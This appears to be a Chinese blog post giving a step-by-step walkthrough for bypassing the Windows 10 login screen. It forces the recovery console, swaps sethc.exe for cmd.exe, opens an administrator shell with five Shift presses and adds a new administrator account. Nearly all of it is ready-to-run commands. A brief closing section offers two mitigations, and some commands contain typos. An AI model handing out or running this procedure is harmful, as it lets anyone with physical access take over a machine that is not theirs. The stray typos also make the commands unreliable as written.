利用系统漏洞破解windows 10用户与防护

利用系统漏洞破解windows 10用户与防护

测试系统:windows 10专业1709版本

我们依旧采用的是采用调用“粘滞键”的方法进行破解,即“sethc.exe”文件做为跳板对本地用户(对使用微软账号来登陆电脑的账号,无法通过DOS进行密码重置)进行修改或者添加新用户方式,来绕过进入系统。


进入“命令提示符”模式:

1.首先,通过对处于登陆界面后按下关机键强关机,然后出现windows logo且下方出现滚动的圆圈的时候再强制关机,如此重复3次。来进入wind10 的RE模式,即诊断修复模式;

2.当出现“自动修复”提示界面时,选择“高级选项”;

3.然依次选择“疑难解答”->“高级选项”->“命令提示符”,然等待;

4.在弹出的管理员cmd对话框,注意此对话框的上方标明了 x:\windows\system32\cmd.exe;(这里调用的不是电脑本身的系统盘符下的cmd)


修改“sethc.exe”文件(即狸猫换太子手法):

  • 在管理员窗口中执行:
diskpart 回车     \\磁盘分区管理工具
list volume 回车   \\获得计算机中分区列表及每个卷的信息
  • 确认好系统盘符后,这里确认为C盘,执行:(本人尝试过,没办法直接切换到C盘目录下做后续操作);
exit 回车  \\退出磁盘分区管理工具
  • 然后执行以下命令来确认c:\windows\system32目录下是否存在cmd.exe 和sethc.exe 两个文件:(记住一定要加上路径);
dir c:\windows\sysytem32\sethc.exe 回车
dir c:\windows\sysytem32\cmd.exe 回车
  • 然后执行以下命令对sethc.exe重命名。我这里改成了sethc11 文件(建议把exe后缀给去掉);
ren c:\windows\system32\sethc.exe sethc11 回车   \\对sethc.exe 文件重命名
  • 复制cmd.exe文件为cmd11.exe。然后重命名cmd11.exesethc.exe即可;
copy c:\windows\system32\cmd.exe c:\windows\system32\cmd11.exe 回车  \\复制cmd.exe为cmd11.exe
ren c:\windows\system32\cmd11.exe sethc.exe 回车  \\重命名cmd11.exe为sethc.exe
  • 关闭管理员窗口,重启windows,正常进入登陆界面;

调用管理员权限cmd对用户进行修改:

  • 在登陆界面,按下5次shift键,然后会弹出管理员权限的CMD窗口;
  • 然后执行以下命令,新增一个用户并升级为管理员权限;
net user sss /add 回车  \\创建一个sss的用户
net localgroup administrators sss /add  \\把sss用户升级为管理员权限
  • 然后你就用可以使用sss用户访问电脑了;

最后总结下此种方式思路其实也是沿用了windows 7的破解方式,但是在进入诊断修复模式这个地方可能会出现不少问题,比如进不去(注意操作方式正确性)。还有就是在通过命令对setch.exe 和 cmd.exe文件修改地方(一定要注意文件存放的位置,不要搞错了)。



不借外部工具,对window 7用户密码破解与防护 zhuanlan.zhihu.com/p/33


这里也顺便介绍下关于此漏洞防护操作。(不知道后期微软会不会修复此问题)

方案一:

简单粗暴,直接把C:\Windows\SysWOW64目录下的sethc文件的执行权限全部取消或让其拒绝访问。

方案二:

开始-运行里执行gpedit.smc,打开本地组策略编辑器。

依次打开用户配置-管理模板-系统,找到不运行指定的windows应用程序策略,将其激活并把sethc.exe添加进去即可

如果大家还有其他方式或意见请留言,谢谢;

编辑于 2018-02-25